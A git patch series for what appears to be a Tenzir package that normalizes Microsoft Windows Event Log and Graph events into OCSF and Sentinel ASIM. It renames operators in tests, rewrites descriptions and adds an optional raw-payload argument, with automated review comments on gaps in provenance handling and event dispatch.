diff --git a/microsoft/tests/ocsf/eid-4726.tql b/microsoft/tests/ocsf/eid-4726.tql
index e5acbda..496a205 100644
--- a/microsoft/tests/ocsf/eid-4726.tql
+++ b/microsoft/tests/ocsf/eid-4726.tql
@@ -1,7 +1,7 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-4726.xml" {
 read_all
 }
-microsoft::windows::ocsf::map data
+microsoft::ocsf::map data
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-4728.tql b/microsoft/tests/ocsf/eid-4728.tql
index 37200b6..f0049af 100644
--- a/microsoft/tests/ocsf/eid-4728.tql
+++ b/microsoft/tests/ocsf/eid-4728.tql
@@ -1,7 +1,7 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-4728.xml" {
 read_all
 }
-microsoft::windows::ocsf::map data
+microsoft::ocsf::map data
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-4730.tql b/microsoft/tests/ocsf/eid-4730.tql
index d9e5dc0..39421c2 100644
--- a/microsoft/tests/ocsf/eid-4730.tql
+++ b/microsoft/tests/ocsf/eid-4730.tql
@@ -1,7 +1,7 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-4730.xml" {
 read_all
 }
-microsoft::windows::ocsf::map data
+microsoft::ocsf::map data
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-4732.tql b/microsoft/tests/ocsf/eid-4732.tql
index 2a09c65..cd590d5 100644
--- a/microsoft/tests/ocsf/eid-4732.tql
+++ b/microsoft/tests/ocsf/eid-4732.tql
@@ -1,7 +1,7 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-4732.xml" {
 read_all
 }
-microsoft::windows::ocsf::map data
+microsoft::ocsf::map data
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-4769.tql b/microsoft/tests/ocsf/eid-4769.tql
index d1edd56..02008ba 100644
--- a/microsoft/tests/ocsf/eid-4769.tql
+++ b/microsoft/tests/ocsf/eid-4769.tql
@@ -1,7 +1,7 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-4769.xml" {
 read_all
 }
-microsoft::windows::ocsf::map data
+microsoft::ocsf::map data
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-4771.tql b/microsoft/tests/ocsf/eid-4771.tql
index 7e95dea..8f31e5f 100644
--- a/microsoft/tests/ocsf/eid-4771.tql
+++ b/microsoft/tests/ocsf/eid-4771.tql
@@ -1,7 +1,7 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-4771.xml" {
 read_all
 }
-microsoft::windows::ocsf::map data
+microsoft::ocsf::map data
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-4776.tql b/microsoft/tests/ocsf/eid-4776.tql
index 1706383..476b404 100644
--- a/microsoft/tests/ocsf/eid-4776.tql
+++ b/microsoft/tests/ocsf/eid-4776.tql
@@ -1,7 +1,7 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-4776.xml" {
   read_all
 }
-microsoft::windows::ocsf::map data
+microsoft::ocsf::map data
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-5001.tql b/microsoft/tests/ocsf/eid-5001.tql
index 8d1ba40..73f76b0 100644
--- a/microsoft/tests/ocsf/eid-5001.tql
+++ b/microsoft/tests/ocsf/eid-5001.tql
@@ -1,7 +1,7 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-5001.xml" {
   read_all
 }
-microsoft::windows::ocsf::map data
+microsoft::ocsf::map data
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-5007.tql b/microsoft/tests/ocsf/eid-5007.tql
index fa112bb..8b5a0bd 100644
--- a/microsoft/tests/ocsf/eid-5007.tql
+++ b/microsoft/tests/ocsf/eid-5007.tql
@@ -1,7 +1,7 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-5007.xml" {
   read_all
 }
-microsoft::windows::ocsf::map data
+microsoft::ocsf::map data
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-6005.tql b/microsoft/tests/ocsf/eid-6005.tql
index 7e3c533..35ffa6b 100644
--- a/microsoft/tests/ocsf/eid-6005.tql
+++ b/microsoft/tests/ocsf/eid-6005.tql
@@ -1,7 +1,7 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-6005.xml" {
   read_all
 }
-microsoft::windows::ocsf::map data
+microsoft::ocsf::map data
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-6006.tql b/microsoft/tests/ocsf/eid-6006.tql
index 6e6e572..4718edd 100644
--- a/microsoft/tests/ocsf/eid-6006.tql
+++ b/microsoft/tests/ocsf/eid-6006.tql
@@ -1,7 +1,7 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-6006.xml" {
   read_all
 }
-microsoft::windows::ocsf::map data
+microsoft::ocsf::map data
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-7034.tql b/microsoft/tests/ocsf/eid-7034.tql
index 69ca766..25fb053 100644
--- a/microsoft/tests/ocsf/eid-7034.tql
+++ b/microsoft/tests/ocsf/eid-7034.tql
@@ -1,7 +1,7 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-7034.xml" {
   read_all
 }
-microsoft::windows::ocsf::map data
+microsoft::ocsf::map data
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-7045.tql b/microsoft/tests/ocsf/eid-7045.tql
index 9640567..bd899e9 100644
--- a/microsoft/tests/ocsf/eid-7045.tql
+++ b/microsoft/tests/ocsf/eid-7045.tql
@@ -1,7 +1,7 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-7045.xml" {
   read_all
 }
-microsoft::windows::ocsf::map data
+microsoft::ocsf::map data
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-9999.tql b/microsoft/tests/ocsf/eid-9999.tql
index 0c28d5f..0aff212 100644
--- a/microsoft/tests/ocsf/eid-9999.tql
+++ b/microsoft/tests/ocsf/eid-9999.tql
@@ -1,7 +1,7 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-9999.xml" {
   read_all
 }
-microsoft::windows::ocsf::map data
+microsoft::ocsf::map data
 ocsf::derive
 ocsf::cast

From 97657e001cb4e9dd3c2df5fb36652712961cae95 Mon Sep 17 00:00:00 2001
From: Matthias Vallentin Date: Mon, 8 Jun 2026 09:11:32 +0200 Subject: [PATCH 04/27] Clean up Microsoft mapper descriptions Keep the new Microsoft mapping UDO frontmatter within the supported operator schema by using plain descriptions only. Assisted-by: GPT-5 (Codex) --- microsoft/operators/asim/map.tql | 2 +- microsoft/operators/asim/ocsf/account_change.tql | 2 +- microsoft/operators/asim/ocsf/authentication.tql | 2 +- microsoft/operators/asim/ocsf/authorize_session.tql | 2 +- microsoft/operators/asim/ocsf/compliance_finding.tql | 2 +- microsoft/operators/asim/ocsf/detection_finding.tql | 2 +- microsoft/operators/asim/ocsf/dhcp_activity.tql | 2 +- microsoft/operators/asim/ocsf/dns_activity.tql | 2 +- microsoft/operators/asim/ocsf/entity_management.tql | 2 +- microsoft/operators/asim/ocsf/event_log_activity.tql | 2 +- microsoft/operators/asim/ocsf/file_system_activity.tql | 2 +- microsoft/operators/asim/ocsf/group_management.tql | 2 +- microsoft/operators/asim/ocsf/helpers/unsupported.tql | 2 +- microsoft/operators/asim/ocsf/http_activity.tql | 2 +- microsoft/operators/asim/ocsf/map.tql | 2 +- microsoft/operators/asim/ocsf/network_activity.tql | 2 +- microsoft/operators/asim/ocsf/process_activity.tql | 2 +- microsoft/operators/asim/ocsf/scheduled_job_activity.tql | 2 +- microsoft/operators/asim/ocsf/windows_service_activity.tql | 2 +- microsoft/operators/ocsf/map.tql | 2 +- 20 files changed, 20 insertions(+), 20 deletions(-) diff --git a/microsoft/operators/asim/map.tql b/microsoft/operators/asim/map.tql index 93204fc..39b67ec 100644 --- a/microsoft/operators/asim/map.tql +++ b/microsoft/operators/asim/map.tql @@ -1,5 +1,5 @@ --- -description: Microsoft event -> Microsoft Sentinel ASIM event. +description: Maps supported Microsoft events to Microsoft Sentinel ASIM. args: positional: - name: log diff --git a/microsoft/operators/asim/ocsf/account_change.tql b/microsoft/operators/asim/ocsf/account_change.tql index 2d88067..8009444 100644 
--- a/microsoft/operators/asim/ocsf/account_change.tql
+++ b/microsoft/operators/asim/ocsf/account_change.tql
@@ -1,5 +1,5 @@
 ---
-description: OCSF Account Change event -> Microsoft Sentinel ASIM UserManagement event.
+description: Maps OCSF Account Change events to Microsoft Sentinel ASIM UserManagement events.
 ---
 
 microsoft::asim::ocsf::helpers::common
diff --git a/microsoft/operators/asim/ocsf/authentication.tql b/microsoft/operators/asim/ocsf/authentication.tql
index f0b9d16..57cdf0a 100644
--- a/microsoft/operators/asim/ocsf/authentication.tql
+++ b/microsoft/operators/asim/ocsf/authentication.tql
@@ -1,5 +1,5 @@
 ---
-description: OCSF Authentication event -> Microsoft Sentinel ASIM Authentication event.
+description: Maps OCSF Authentication events to Microsoft Sentinel ASIM Authentication events.
 ---
 
 microsoft::asim::ocsf::helpers::common
diff --git a/microsoft/operators/asim/ocsf/authorize_session.tql b/microsoft/operators/asim/ocsf/authorize_session.tql
index 00af6c7..40be37e 100644
--- a/microsoft/operators/asim/ocsf/authorize_session.tql
+++ b/microsoft/operators/asim/ocsf/authorize_session.tql
@@ -1,5 +1,5 @@
 ---
-description: OCSF Authorize Session event -> Microsoft Sentinel ASIM Authentication event.
+description: Maps OCSF Authorize Session events to Microsoft Sentinel ASIM Authentication events.
 ---
 
 microsoft::asim::ocsf::helpers::common
diff --git a/microsoft/operators/asim/ocsf/compliance_finding.tql b/microsoft/operators/asim/ocsf/compliance_finding.tql
index 035f6c8..9f95a88 100644
--- a/microsoft/operators/asim/ocsf/compliance_finding.tql
+++ b/microsoft/operators/asim/ocsf/compliance_finding.tql
@@ -1,5 +1,5 @@
 ---
-description: OCSF Compliance Finding event -> Microsoft Sentinel ASIM AlertEvent.
+description: Maps OCSF Compliance Finding events to Microsoft Sentinel ASIM AlertEvent records.
 ---
 
 microsoft::asim::ocsf::helpers::common
diff --git a/microsoft/operators/asim/ocsf/detection_finding.tql b/microsoft/operators/asim/ocsf/detection_finding.tql
index cdc8b16..823fe35 100644
--- a/microsoft/operators/asim/ocsf/detection_finding.tql
+++ b/microsoft/operators/asim/ocsf/detection_finding.tql
@@ -1,5 +1,5 @@
 ---
-description: OCSF Detection Finding event -> Microsoft Sentinel ASIM AlertEvent.
+description: Maps OCSF Detection Finding events to Microsoft Sentinel ASIM AlertEvent records.
 ---
 
 let $threat_categories = {
diff --git a/microsoft/operators/asim/ocsf/dhcp_activity.tql b/microsoft/operators/asim/ocsf/dhcp_activity.tql
index 2b95d96..835b82b 100644
--- a/microsoft/operators/asim/ocsf/dhcp_activity.tql
+++ b/microsoft/operators/asim/ocsf/dhcp_activity.tql
@@ -1,5 +1,5 @@
 ---
-description: OCSF DHCP Activity event -> Microsoft Sentinel ASIM DhcpEvent.
+description: Maps OCSF DHCP Activity events to Microsoft Sentinel ASIM DhcpEvent records.
 ---
 
 microsoft::asim::ocsf::helpers::common
diff --git a/microsoft/operators/asim/ocsf/dns_activity.tql b/microsoft/operators/asim/ocsf/dns_activity.tql
index c84f776..6c346d0 100644
--- a/microsoft/operators/asim/ocsf/dns_activity.tql
+++ b/microsoft/operators/asim/ocsf/dns_activity.tql
@@ -1,5 +1,5 @@
 ---
-description: OCSF DNS Activity event -> Microsoft Sentinel ASIM Dns event.
+description: Maps OCSF DNS Activity events to Microsoft Sentinel ASIM Dns records.
 ---
 
 microsoft::asim::ocsf::helpers::common
diff --git a/microsoft/operators/asim/ocsf/entity_management.tql b/microsoft/operators/asim/ocsf/entity_management.tql
index 831ce0d..4ec2bd3 100644
--- a/microsoft/operators/asim/ocsf/entity_management.tql
+++ b/microsoft/operators/asim/ocsf/entity_management.tql
@@ -1,5 +1,5 @@
 ---
-description: OCSF Entity Management event -> Microsoft Sentinel ASIM AuditEvent.
+description: Maps OCSF Entity Management events to Microsoft Sentinel ASIM AuditEvent records.
 ---
 
 microsoft::asim::ocsf::helpers::common
diff --git a/microsoft/operators/asim/ocsf/event_log_activity.tql b/microsoft/operators/asim/ocsf/event_log_activity.tql
index 8644640..b764b0e 100644
--- a/microsoft/operators/asim/ocsf/event_log_activity.tql
+++ b/microsoft/operators/asim/ocsf/event_log_activity.tql
@@ -1,5 +1,5 @@
 ---
-description: OCSF Event Log Activity event -> Microsoft Sentinel ASIM AuditEvent.
+description: Maps OCSF Event Log Activity events to Microsoft Sentinel ASIM AuditEvent records.
 ---
 
 microsoft::asim::ocsf::helpers::common
diff --git a/microsoft/operators/asim/ocsf/file_system_activity.tql b/microsoft/operators/asim/ocsf/file_system_activity.tql
index c53fb0d..1e17f87 100644
--- a/microsoft/operators/asim/ocsf/file_system_activity.tql
+++ b/microsoft/operators/asim/ocsf/file_system_activity.tql
@@ -1,5 +1,5 @@
 ---
-description: OCSF File System Activity event -> Microsoft Sentinel ASIM FileEvent.
+description: Maps OCSF File System Activity events to Microsoft Sentinel ASIM FileEvent records.
 ---
 
 microsoft::asim::ocsf::helpers::common
diff --git a/microsoft/operators/asim/ocsf/group_management.tql b/microsoft/operators/asim/ocsf/group_management.tql
index 5d18efd..8ff4cea 100644
--- a/microsoft/operators/asim/ocsf/group_management.tql
+++ b/microsoft/operators/asim/ocsf/group_management.tql
@@ -1,5 +1,5 @@
 ---
-description: OCSF Group Management event -> Microsoft Sentinel ASIM UserManagement event.
+description: Maps OCSF Group Management events to Microsoft Sentinel ASIM UserManagement events.
 ---
 
 microsoft::asim::ocsf::helpers::common
diff --git a/microsoft/operators/asim/ocsf/helpers/unsupported.tql b/microsoft/operators/asim/ocsf/helpers/unsupported.tql
index 9388c7d..9d62845 100644
--- a/microsoft/operators/asim/ocsf/helpers/unsupported.tql
+++ b/microsoft/operators/asim/ocsf/helpers/unsupported.tql
@@ -1,5 +1,5 @@
 ---
-description: Drops unsupported OCSF -> ASIM mappings with a warning.
+description: Drops unsupported OCSF to ASIM mappings with a warning.
 ---
 
 assert false, message={
diff --git a/microsoft/operators/asim/ocsf/http_activity.tql b/microsoft/operators/asim/ocsf/http_activity.tql
index 2a4b1e6..95866cc 100644
--- a/microsoft/operators/asim/ocsf/http_activity.tql
+++ b/microsoft/operators/asim/ocsf/http_activity.tql
@@ -1,5 +1,5 @@
 ---
-description: OCSF HTTP Activity event -> Microsoft Sentinel ASIM WebSession.
+description: Maps OCSF HTTP Activity events to Microsoft Sentinel ASIM WebSession records.
 ---
 
 microsoft::asim::ocsf::helpers::common
diff --git a/microsoft/operators/asim/ocsf/map.tql b/microsoft/operators/asim/ocsf/map.tql
index e59945c..3fe08b4 100644
--- a/microsoft/operators/asim/ocsf/map.tql
+++ b/microsoft/operators/asim/ocsf/map.tql
@@ -1,5 +1,5 @@
 ---
-description: Validated OCSF 1.8 event -> Microsoft Sentinel ASIM event.
+description: Maps validated OCSF 1.8 events to Microsoft Sentinel ASIM.
 ---
 
 match class_uid {
diff --git a/microsoft/operators/asim/ocsf/network_activity.tql b/microsoft/operators/asim/ocsf/network_activity.tql
index 1077e0f..8836cf6 100644
--- a/microsoft/operators/asim/ocsf/network_activity.tql
+++ b/microsoft/operators/asim/ocsf/network_activity.tql
@@ -1,5 +1,5 @@
 ---
-description: OCSF Network Activity event -> Microsoft Sentinel ASIM NetworkSession.
+description: Maps OCSF Network Activity events to Microsoft Sentinel ASIM NetworkSession records.
 ---
 
 microsoft::asim::ocsf::helpers::common
diff --git a/microsoft/operators/asim/ocsf/process_activity.tql b/microsoft/operators/asim/ocsf/process_activity.tql
index 6437521..6143e90 100644
--- a/microsoft/operators/asim/ocsf/process_activity.tql
+++ b/microsoft/operators/asim/ocsf/process_activity.tql
@@ -1,5 +1,5 @@
 ---
-description: OCSF Process Activity event -> Microsoft Sentinel ASIM ProcessEvent.
+description: Maps OCSF Process Activity events to Microsoft Sentinel ASIM ProcessEvent records.
 ---
 
 microsoft::asim::ocsf::helpers::common
diff --git a/microsoft/operators/asim/ocsf/scheduled_job_activity.tql b/microsoft/operators/asim/ocsf/scheduled_job_activity.tql
index 09e300d..a32b74e 100644
--- a/microsoft/operators/asim/ocsf/scheduled_job_activity.tql
+++ b/microsoft/operators/asim/ocsf/scheduled_job_activity.tql
@@ -1,5 +1,5 @@
 ---
-description: OCSF Scheduled Job Activity event -> Microsoft Sentinel ASIM AuditEvent.
+description: Maps OCSF Scheduled Job Activity events to Microsoft Sentinel ASIM AuditEvent records.
 ---
 
 microsoft::asim::ocsf::helpers::common
diff --git a/microsoft/operators/asim/ocsf/windows_service_activity.tql b/microsoft/operators/asim/ocsf/windows_service_activity.tql
index 0238afc..ec9b967 100644
--- a/microsoft/operators/asim/ocsf/windows_service_activity.tql
+++ b/microsoft/operators/asim/ocsf/windows_service_activity.tql
@@ -1,5 +1,5 @@
 ---
-description: OCSF Windows Service Activity event -> Microsoft Sentinel ASIM AuditEvent.
+description: Maps OCSF Windows Service Activity events to Microsoft Sentinel ASIM AuditEvent records.
 ---
 
 microsoft::asim::ocsf::helpers::common
diff --git a/microsoft/operators/ocsf/map.tql b/microsoft/operators/ocsf/map.tql
index c1db810..0c67d69 100644
--- a/microsoft/operators/ocsf/map.tql
+++ b/microsoft/operators/ocsf/map.tql
@@ -1,5 +1,5 @@
 ---
-description: Microsoft event -> OCSF.
+description: Maps supported Microsoft events to OCSF.
 args:
   positional:
     - name: log

From d3ba466db5f812ff69e2318f9d09303d3065c38e Mon Sep 17 00:00:00 2001
From: Matthias Vallentin Date: Mon, 8 Jun 2026 15:57:57 +0200 Subject: [PATCH 05/27] Normalize Microsoft mapper inputs Treat Microsoft OCSF and ASIM dispatchers as current-event mappers and make raw payload preservation optional provenance. Update Windows Event Log tests to parse XML explicitly before mapping and refresh their baselines. Assisted-by: GPT-5 Codex (Superconductor) --- .../unreleased/ocsf-to-asim-mapper.md | 9 ++++++++ .../examples/windows-event-log-to-ocsf.tql | 12 +++++++++++ microsoft/operators/asim/map.tql | 13 ++++-------- microsoft/operators/graph/ocsf/map.tql | 10 +++++++++ microsoft/operators/ocsf/map.tql | 13 ++++++------ microsoft/operators/windows/ocsf/map.tql | 21 ++++++++++--------- microsoft/tests/asim/windows.tql | 3 ++- microsoft/tests/ocsf/eid-0100.tql | 3 ++- microsoft/tests/ocsf/eid-0100.txt | 2 -- microsoft/tests/ocsf/eid-0101.tql | 3 ++- microsoft/tests/ocsf/eid-0101.txt | 2 -- microsoft/tests/ocsf/eid-0102.tql | 3 ++- microsoft/tests/ocsf/eid-0102.txt | 2 -- microsoft/tests/ocsf/eid-0106.tql | 3 ++- microsoft/tests/ocsf/eid-0106.txt | 2 -- microsoft/tests/ocsf/eid-0129.tql | 3 ++- microsoft/tests/ocsf/eid-0129.txt | 2 -- microsoft/tests/ocsf/eid-0140.tql | 3 ++- microsoft/tests/ocsf/eid-0140.txt | 2 -- microsoft/tests/ocsf/eid-0141.tql | 3 ++- microsoft/tests/ocsf/eid-0141.txt | 2 -- microsoft/tests/ocsf/eid-0200.tql | 3 ++- microsoft/tests/ocsf/eid-0200.txt | 2 -- microsoft/tests/ocsf/eid-0201.tql | 3 ++- microsoft/tests/ocsf/eid-0201.txt | 2 -- microsoft/tests/ocsf/eid-1000.tql | 3 ++- microsoft/tests/ocsf/eid-1000.txt | 2 -- microsoft/tests/ocsf/eid-1001.tql | 3 ++- microsoft/tests/ocsf/eid-1001.txt | 2 -- microsoft/tests/ocsf/eid-1002.tql | 3 ++- microsoft/tests/ocsf/eid-1002.txt | 2 -- microsoft/tests/ocsf/eid-1006.tql | 3 ++- microsoft/tests/ocsf/eid-1006.txt | 2 -- microsoft/tests/ocsf/eid-1007.tql | 3 ++- microsoft/tests/ocsf/eid-1007.txt | 2 -- microsoft/tests/ocsf/eid-1102.tql | 3 ++- microsoft/tests/ocsf/eid-1102.txt | 
2 -- microsoft/tests/ocsf/eid-1116.tql | 3 ++- microsoft/tests/ocsf/eid-1116.txt | 2 -- microsoft/tests/ocsf/eid-1117.tql | 3 ++- microsoft/tests/ocsf/eid-1117.txt | 2 -- microsoft/tests/ocsf/eid-1121.tql | 3 ++- microsoft/tests/ocsf/eid-1121.txt | 2 -- microsoft/tests/ocsf/eid-2000.tql | 3 ++- microsoft/tests/ocsf/eid-2000.txt | 2 -- microsoft/tests/ocsf/eid-4100.tql | 3 ++- microsoft/tests/ocsf/eid-4100.txt | 2 -- microsoft/tests/ocsf/eid-4103.tql | 3 ++- microsoft/tests/ocsf/eid-4103.txt | 2 -- microsoft/tests/ocsf/eid-4104.tql | 3 ++- microsoft/tests/ocsf/eid-4104.txt | 2 -- microsoft/tests/ocsf/eid-4105.tql | 3 ++- microsoft/tests/ocsf/eid-4105.txt | 2 -- microsoft/tests/ocsf/eid-4106.tql | 3 ++- microsoft/tests/ocsf/eid-4106.txt | 2 -- microsoft/tests/ocsf/eid-4624.tql | 3 ++- microsoft/tests/ocsf/eid-4624.txt | 2 -- microsoft/tests/ocsf/eid-4625.tql | 3 ++- microsoft/tests/ocsf/eid-4625.txt | 2 -- microsoft/tests/ocsf/eid-4648.tql | 3 ++- microsoft/tests/ocsf/eid-4648.txt | 2 -- microsoft/tests/ocsf/eid-4672.tql | 3 ++- microsoft/tests/ocsf/eid-4672.txt | 2 -- microsoft/tests/ocsf/eid-4688.tql | 3 ++- microsoft/tests/ocsf/eid-4688.txt | 2 -- microsoft/tests/ocsf/eid-4697.tql | 3 ++- microsoft/tests/ocsf/eid-4697.txt | 2 -- microsoft/tests/ocsf/eid-4698.tql | 3 ++- microsoft/tests/ocsf/eid-4698.txt | 2 -- microsoft/tests/ocsf/eid-4720.tql | 3 ++- microsoft/tests/ocsf/eid-4720.txt | 2 -- microsoft/tests/ocsf/eid-4722.tql | 3 ++- microsoft/tests/ocsf/eid-4722.txt | 2 -- microsoft/tests/ocsf/eid-4725.tql | 3 ++- microsoft/tests/ocsf/eid-4725.txt | 2 -- microsoft/tests/ocsf/eid-4726.tql | 3 ++- microsoft/tests/ocsf/eid-4726.txt | 2 -- microsoft/tests/ocsf/eid-4728.tql | 3 ++- microsoft/tests/ocsf/eid-4728.txt | 2 -- microsoft/tests/ocsf/eid-4730.tql | 3 ++- microsoft/tests/ocsf/eid-4730.txt | 2 -- microsoft/tests/ocsf/eid-4732.tql | 3 ++- microsoft/tests/ocsf/eid-4732.txt | 2 -- microsoft/tests/ocsf/eid-4769.tql | 3 ++- microsoft/tests/ocsf/eid-4769.txt | 2 -- 
microsoft/tests/ocsf/eid-4771.tql | 3 ++- microsoft/tests/ocsf/eid-4771.txt | 2 -- microsoft/tests/ocsf/eid-4776.tql | 3 ++- microsoft/tests/ocsf/eid-4776.txt | 2 -- microsoft/tests/ocsf/eid-5001.tql | 3 ++- microsoft/tests/ocsf/eid-5001.txt | 2 -- microsoft/tests/ocsf/eid-5007.tql | 3 ++- microsoft/tests/ocsf/eid-5007.txt | 2 -- microsoft/tests/ocsf/eid-6005.tql | 3 ++- microsoft/tests/ocsf/eid-6005.txt | 2 -- microsoft/tests/ocsf/eid-6006.tql | 3 ++- microsoft/tests/ocsf/eid-6006.txt | 2 -- microsoft/tests/ocsf/eid-7034.tql | 3 ++- microsoft/tests/ocsf/eid-7034.txt | 2 -- microsoft/tests/ocsf/eid-7045.tql | 3 ++- microsoft/tests/ocsf/eid-7045.txt | 2 -- microsoft/tests/ocsf/eid-9999.tql | 3 ++- microsoft/tests/ocsf/eid-9999.txt | 2 -- 103 files changed, 150 insertions(+), 171 deletions(-) create mode 100644 microsoft/examples/windows-event-log-to-ocsf.tql diff --git a/microsoft/changelog/unreleased/ocsf-to-asim-mapper.md b/microsoft/changelog/unreleased/ocsf-to-asim-mapper.md index f0b462d..a59053f 100644 --- a/microsoft/changelog/unreleased/ocsf-to-asim-mapper.md +++ b/microsoft/changelog/unreleased/ocsf-to-asim-mapper.md @@ -4,6 +4,8 @@ type: feature authors: - mavam - codex +prs: + - 153 created: 2026-06-07T00:00:00Z --- 
@@ -12,6 +14,13 @@ Microsoft events into flat Microsoft Sentinel ASIM event records. The mapper uses the new `microsoft::ocsf::map` entry point and `microsoft::asim::ocsf::map` for validated OCSF 1.8 events. +Microsoft mapping operators now treat the current event as the source event to +map. For raw Windows Event Log XML, first run `this = data.parse_winlog()`; +the resulting structured event can then be normalized through +`microsoft::ocsf::map` or `microsoft::asim::map`. Mapping operators accept an +optional `raw` value when the original source payload is still available and +should be preserved in OCSF `raw_data` and `raw_data_size`. + The mapper covers the Microsoft package's current OCSF authentication, process, audit, user-management, and alert outputs, plus direct OCSF counterparts for file, network, DNS, DHCP, and web session ASIM schemas. The full original OCSF diff --git a/microsoft/examples/windows-event-log-to-ocsf.tql b/microsoft/examples/windows-event-log-to-ocsf.tql new file mode 100644 index 0000000..7970b53 --- /dev/null +++ b/microsoft/examples/windows-event-log-to-ocsf.tql @@ -0,0 +1,12 @@ +--- +name: Windows Event Log XML → OCSF +description: Parse Windows Event Log XML and map the structured event to OCSF. +--- + +from_file "windows-event.xml" { + read_all +} +this = data.parse_winlog() +microsoft::windows::ocsf::map +ocsf::derive +ocsf::cast diff --git a/microsoft/operators/asim/map.tql b/microsoft/operators/asim/map.tql index 39b67ec..81b6bb2 100644 --- a/microsoft/operators/asim/map.tql +++ b/microsoft/operators/asim/map.tql 
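Review bot: The new example reassigns `this = data.parse_winlog()` before calling `microsoft::windows::ocsf::map`, so at the point where the mapper's new optional `raw` argument could be passed the original XML in `data` is no longer part of the event, and neither this example nor the changelog text in the same commit shows a pipeline that actually preserves `raw_data`. As written, `raw` reads as an argument no documented pipeline can set; a second example, or one more sentence in the changelog, showing how to keep the source payload alongside the parsed event before mapping would make the provenance option usable. From a forensics standpoint this matters because the baselines in this commit drop `raw_data`/`raw_data_size` entirely, so the default path now yields OCSF records with no original payload to fall back on when a field mapping is questioned. The minimal example itself is fine for the non-provenance case.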
@@ -1,21 +1,16 @@ --- description: Maps supported Microsoft events to Microsoft Sentinel ASIM. args: - positional: - - name: log - description: The field that holds a raw Microsoft event, such as Windows Event Log XML. + named: + - name: raw + description: Raw Microsoft event to preserve in OCSF `raw_data` before ASIM mapping. default: null --- if class_uid? != null { microsoft::asim::ocsf::map } else { - if $log != null { - _microsoft_asim_log = $log - microsoft::ocsf::map _microsoft_asim_log - } else { - microsoft::ocsf::map - } + microsoft::ocsf::map raw=$raw ocsf::derive ocsf::cast microsoft::asim::ocsf::map diff --git a/microsoft/operators/graph/ocsf/map.tql b/microsoft/operators/graph/ocsf/map.tql index 992c381..7838e67 100644 --- a/microsoft/operators/graph/ocsf/map.tql +++ b/microsoft/operators/graph/ocsf/map.tql @@ -1,10 +1,20 @@ --- description: Microsoft Graph → OCSF +args: + named: + - name: raw + description: Raw Microsoft Graph event to preserve in OCSF `raw_data`. + default: null --- this = {graph: this} ocsf = {} +if $raw != null { + ocsf.raw_data = $raw + ocsf.raw_data_size = $raw.length_bytes() +} + ocsf.cloud = { provider: "Azure", } diff --git a/microsoft/operators/ocsf/map.tql b/microsoft/operators/ocsf/map.tql index 0c67d69..004d099 100644 --- a/microsoft/operators/ocsf/map.tql +++ b/microsoft/operators/ocsf/map.tql @@ -1,15 +1,14 @@ --- description: Maps supported Microsoft events to OCSF. args: - positional: - - name: log - description: The field that holds a raw Microsoft event, such as Windows Event Log XML. + named: + - name: raw + description: Raw Microsoft event to preserve in OCSF `raw_data`. default: null --- -if $log != null { - _microsoft_ocsf_log = $log - microsoft::windows::ocsf::map _microsoft_ocsf_log +if @name == "microsoft.windows.eventlog" or System? != null { + microsoft::windows::ocsf::map raw=$raw } else { - microsoft::graph::ocsf::map + microsoft::graph::ocsf::map raw=$raw } 
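Review bot: In the `class_uid? != null` branch of microsoft/operators/asim/map.tql the new `$raw` argument is never read, so a caller that passes `raw=` together with an event that is already OCSF silently loses the payload it asked to preserve. The argument description should state the limitation, e.g. `description: Raw Microsoft event to preserve in OCSF raw_data before ASIM mapping; ignored when the input already carries class_uid.`, or the branch should emit a diagnostic when `$raw` is non-null. The rest of the operator body continues outside the hunk.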
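Review bot: The `if $raw != null { ocsf.raw_data = $raw; ocsf.raw_data_size = $raw.length_bytes() }` block added to microsoft/operators/graph/ocsf/map.tql is repeated verbatim in microsoft/operators/windows/ocsf/map.tql in this same commit; a shared helper under the existing helpers layout would keep the two from drifting. Also note that no test in this commit passes `raw=`, and the refreshed .txt baselines remove `raw_data`/`raw_data_size`, so the preservation branch in both mappers is now unexercised; one test that sets `raw` on a parsed Windows event would cover it. `length_bytes()` presumably requires a string or blob input — if `raw` can arrive as something else, the description should say what type is expected.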
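Review bot: The dispatch `if @name == "microsoft.windows.eventlog" or System? != null` in microsoft/operators/ocsf/map.tql routes on payload shape, so any non-Windows event that happens to carry a top-level `System` field is normalized by the Windows mapper, and every other event — including inputs that are neither Windows Event Log nor Graph — falls through to the Graph mapper without a diagnostic. For a normalization layer that feeds detections, a mis-routed event is normalized under the wrong OCSF class silently, which is harder to notice than a dropped one; documenting the fallback in the frontmatter, e.g. `description: Maps supported Microsoft events to OCSF; inputs without a Windows Event Log shape are treated as Microsoft Graph events.`, or adding an explicit Graph-shape check before the else branch, would make the behavior visible. The eid-* tests in this commit are switched to call `microsoft::windows::ocsf::map` directly, so this branch condition is now exercised only indirectly through microsoft/tests/asim/windows.tql.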
